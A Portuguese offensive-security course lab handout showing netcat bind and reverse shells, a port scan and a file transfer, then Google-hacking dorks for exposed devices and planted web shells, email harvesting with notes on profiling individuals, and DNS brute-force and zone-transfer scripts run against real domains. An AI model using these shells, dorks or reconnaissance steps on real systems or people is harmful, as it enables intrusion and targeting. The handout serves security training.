2 netcat enum-pub

28
Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 1 Laboratório do Curso de Segurança Ofensiva Netcat e Enumeração (Google Hacking, Whois e DNS) 1. NETCAT a) Ajuda root@bt:~/lab_bash-script# nc -h [v1.10-38] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp\-data'). root@bt:~/lab_bash-script#

Upload: cassio-ramos

Post on 09-Jun-2015

1.895 views

Category:

Documents


3 download

TRANSCRIPT

Page 1: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 1

Laboratório do Curso de Segurança Ofensiva

Netcat e Enumeração (Google Hacking, Whois e DNS)

1. NETCAT

a) Ajuda

root@bt:~/lab_bash-script# nc -h [v1.10-38] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp\-data'). root@bt:~/lab_bash-script#

Page 2: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 2

b) Banner grabbing Verificando portas abertas e lendo banners

c) CHATT Simples No Backtrack

nc -lvp 4444

root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21 (UNKNOWN) [172.16.49.100] 21 (ftp) open 220 (vsFTPd 2.3.0) root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80 (UNKNOWN) [172.16.49.100] 80 (www) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 20 Jun 2012 22:01:42 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT ETag: "c5af2-b1-4c2ee7bee7e05" Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Connection: close Content-Type: text/html

Page 3: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 3

No Windows XP-SP2

nc -nv 172.16.49.130 4444

Basta digitar qualquer coisa em qualquer uma das máquinas

d) Administração Remota - BIND SHEL

No BT localizado na rede externa

No maquina windows XP-SP2 na rede interna

root@bt:~# nc -lvp 4444 -e /bin/bash listening on [any] 4444 ...

C:\>nc -nv 172.16.49.130 4444

(UNKNOWN) [172.16.49.130] 4444 (?) open

ls

Desktop

lab_bash-script

rota.sh

Page 4: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 4

- REVERSE SHELL – NC

No BT localizado na rede externa

Na máquina windows XP-SP2 na rede interna

Resultado no BT

e) Port Scan BT externo scaneando o Firewall (portas 21 a 30)

C:\>nc -nv 172.16.49.130 4444 -e cmd.exe

(UNKNOWN) [172.16.49.130] 4444 (?) open

root@bt:~# nc -lvp 4444 listening on [any] 4444 ...

root@bt:~# nc -lvp 4444

listening on [any] 4444 ...

172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out

connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.

C:\>hostname

hostname

CTP028

C:\>

root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30

(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused

(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused

(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused

(UNKNOWN) [172.16.49.100] 22 (ssh) open

(UNKNOWN) [172.16.49.100] 21 (ftp) open

Page 5: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 5

f) Transferência de Arquivos BT externo scaneando o Firewall (portas 21 a 30)

No windows XP-SP2 na rede interna

Resultado

root@bt:~# nc -lvp 4444 > output.txt

listening on [any] 4444 ...

172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out

connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224

C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt

(UNKNOWN) [172.16.49.130] 4444 (?) open

root@bt:~# ls

Desktop lab_bash-script output.txt rota.sh

root@bt:~# more output.txt

teste de transferencia

root@bt:~#

Page 6: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 6

2. Google Search

google search operators - verificar site operator e outros

site:offensive-security.com - ver quantas pag web tem o domínio - paginas indexadas

Page 7: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 7

site www.offensive-security.com filetype:pdf (só PDF)

site:aeoi.org.ir (21.800 pages)

Page 8: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 8

intitle:"Remote Desktop Web Connection" inurl:tsweb

Page 9: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 9

google hacking database -- ghdb google hacking database

site com webmin rodando

inurl:10000 webmin

Page 10: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 10

site com vnc server rodando

intitle:"VNC viewer for java" --- servidores VNC

http://okbk.myvnc.com:5800/

Page 11: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 11

servidor de impressão

intitle:"Network Print Server" filetype:shtm

interface web roteador speed stream

intitle:"SpeedStream Router Management Interface"

Page 12: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 12

intitle:"Setup Home" "You will need * log in before * * change * settings" (belkin)

Camera de Seguranca

inurl:"viewerframe?mode=motion"

Page 13: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 13

inurl:"ViewerFrame?Mode="

inurl:"view/index.shtml"

"please visit" intitle:"i-Catcher Console" Copyright "iCode"

intitle:"everfocus edsr applet"

Page 14: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 14

Software de videoconf

intext:"Videoconference Management System" ext:htm

phpmyadmin aberto

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"

Page 15: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 15

Norton AV for gateways

inurl:"8003/Display?what="

contatos MSN

filetype:ctt "msn"

Page 16: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 16

Kickstart

#kickstart filetype:cfg

#kickstart filetype:cfg site:gov.br

CUIDADO!!!!!!

backdoor apache

intitle:r57 shell filetype:php

Site com backdoor plantado - antichat no title

intitle:"Antichat Shell" "disable functions"

Page 17: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 17

3. Google Search Social

aeoi.org.ir puro no google - ver emails

utilizar theharvester.py (script em python no BT)

root@bt:~# cd /pentest/enumeration/theharvester/ root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google [-] Searching in Google: Searching 0 results... Searching 100 results... Searching 200 results... [+] Emails found: ------------------ [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]

Page 18: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 18

usar [email protected]

é um pesquisador, tem email yahoo

usar [email protected]

Page 19: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 19

ver SPAG Zeolite

end da empress tel de contato e outro email do gmail

- procurar foto

usar [email protected] - procurando apto veja telefone

Page 20: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 20

Page 21: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 21

4. Whois

Page 22: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 22

Consulta whois

root@bt:~# whois checkpoint.com | more

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered

with many different competing registrars. Go to http://www.internic.net

for detailed information.

Server Name: CHECKPOINT.COM

IP Address: 216.200.241.66

Registrar: NETWORK SOLUTIONS, LLC.

Whois Server: whois.networksolutions.com

Referral URL: http://www.networksolutions.com/en_US/

Domain Name: CHECKPOINT.COM

Registrar: NETWORK SOLUTIONS, LLC.

Whois Server: whois.networksolutions.com

Referral URL: http://www.networksolutions.com/en_US/

Name Server: NS2.CHECKPOINT.COM

Name Server: NS6.CHECKPOINT.COM

Name Server: NS8.CHECKPOINT.COM

Name Server: NS9.CHECKPOINT.COM

Status: clientTransferProhibited

Updated Date: 30-may-2012

Creation Date: 29-mar-1994

Expiration Date: 30-mar-2018

Administrative Contact, Technical Contact: Admin, DNS [email protected] Check Point Software Technologies Ltd. 3A Jabotinsky St. Ramat-Gan, 52520 IL +972-3-7534555 fax: +972-3-5759256 Record expires on 30-Mar-2018. Record created on 29-Mar-1994. Database last updated on 20-Jun-2012 22:30:44 EDT. Domain servers in listed order: NS2.CHECKPOINT.COM 206.184.151.195 NS6.CHECKPOINT.COM 194.29.32.199 NS8.CHECKPOINT.COM 216.228.148.29 NS9.CHECKPOINT.COM 194.29.38.64

Page 23: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 23

Consulta Reversa whois

root@bt:~# whois 216.200.241.66 # # Query terms are ambiguous. The query is assumed to be: # "n 216.200.241.66" # # Use "?" to get help. # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2 # CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79 Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html

Page 24: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 24

5. DNS

Consultas Manuais

Consulta de Servidor de Email e de Nomes do domínio

root@bt:~# nslookup www.checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: Name: www.checkpoint.com Address: 216.200.241.66

root@bt:~# nslookup > set type=mx > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com mail exchanger = 12 sami.checkpoint.com. checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com. Authoritative answers can be found from: > set type=ns > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com nameserver = ns2.checkpoint.com. checkpoint.com nameserver = ns6.checkpoint.com. checkpoint.com nameserver = ns8.checkpoint.com. checkpoint.com nameserver = ns9.checkpoint.com. checkpoint.com nameserver = ns1.checkpoint.com. Authoritative answers can be found from: >

Page 25: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 25

- DNS Information Gathering 1- forward lookup BF - tentar acertar nomes validos

- usar script1.sh no BT para FB (sem manipulação)

- usar script2.sh no BT para FB ("has address")

root@bt:~/lab_DNS# host www.checkpoint.com www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10 root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN) root@bt:~/lab_DNS#

root@bt:~/lab_DNS# more script_dns1.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com done

root@bt:~/lab_DNS# more script_dns2.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" done root@bt:~/lab_DNS# ./script_dns2.sh forums.checkpoint.com has address 194.29.38.13 ftp.checkpoint.com has address 194.29.38.25 ftps.checkpoint.com has address 194.29.38.27 mailhost.checkpoint.com has address 194.29.32.199 cale.checkpoint.com has address 194.29.32.199 mx1.checkpoint.com has address 194.29.38.66 ns.checkpoint.com has address 194.29.32.199 ns1.checkpoint.com has address 208.185.174.140 ns2.checkpoint.com has address 208.185.174.141 register.checkpoint.com has address 194.29.38.35 search.us.checkpoint.com has address 209.87.209.207 smtp.checkpoint.com has address 194.29.34.68 www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has address 216.200.241.66 root@bt:~/lab_DNS#

Page 26: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 26

- usar script3.sh no BT para FB (só IPs)

2- reverse lookup BF

- Tentar resolução Reversa

root@bt:~/lab_DNS# more script_dns3.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" | cut -d" " -f4 done root@bt:~/lab_DNS# ./script_dns3.sh 194.29.38.13 194.29.38.25 194.29.38.27 194.29.32.199 194.29.32.199 194.29.38.66 194.29.32.199 208.185.174.140 208.185.174.141 194.29.38.35 209.87.209.207 194.29.34.68 216.200.241.66 216.200.241.66

root@bt:~/lab_DNS# host 216.200.241.66 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done 64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net. 65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com. 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. 67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com. 68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com. 69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com. 70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com. 71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com. 72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com. 73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com. 74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com. 75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com. 76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com. 77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com. 78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com. 79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.

Page 27: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 27

3- Zone transfer

------tentar com todos servidores de nomes - (primário e secundários)

------fazer com aeoi.org.ir e estacio.br

root@bt:~# host -t ns offensive-security.com offensive-security.com name server ns4.no-ip.com. offensive-security.com name server ns2.no-ip.com. offensive-security.com name server ns1.no-ip.com. offensive-security.com name server ns3.no-ip.com. offensive-security.com name server ns5.no-ip.com. root@bt:~# host -l offensive-security.com ns1.no-ip.com ; Transfer failed. Using domain server: Name: ns1.no-ip.com Address: 204.16.255.55#53 Aliases: Host offensive-security.com.localdomain not found: 9(NOTAUTH) ; Transfer failed.

Page 28: 2 netcat enum-pub

S o l u t i o n C o n s u l t o r i a e T r e i n a m e n t o

w w w . s o l u t i o n - r j . c o m . b r

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993 28

Usar /pentest/enumeration/dnsenum

root@bt:/pentest/enumeration/dns/dnsenum# ls dns-big.txt dnsenum.pl dns.txt README.txt root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br estacio.br 5 IN A 200.216.152.71 Name Servers: ns1.estacio.br 5 IN A 200.216.152.249 ns2.estacio.br 5 IN A 200.216.152.250 Mail (MX) Servers: Mail.Global.FrontBridge.com 5 IN A 216.32.180.22 Mail.Global.FrontBridge.com 5 IN A 216.32.181.178 estacio.br 1800 IN TXT estacio.br 1800 IN A 200.216.152.71 1989163337.estacio.br 1800 IN CNAME mail._domainkey.estacio.br 14400 IN TXT agenda.estacio.br 1800 IN A 200.216.152.71 agendaconselho.estacio.br 1800 IN A 200.216.152.71 aluno.estacio.br 1800 IN MX biblioteca.estacio.br 1800 IN CNAME bibliotecasonora.estacio.br 1800 IN A 200.216.152.90 blogdopresidente.estacio.br 1800 IN A 200.216.152.149 bquestoes.estacio.br 1800 IN A 200.216.152.63 adm.bquestoes.estacio.br 1800 IN A 200.216.152.62 provas.bquestoes.estacio.br 1800 IN A 200.216.152.63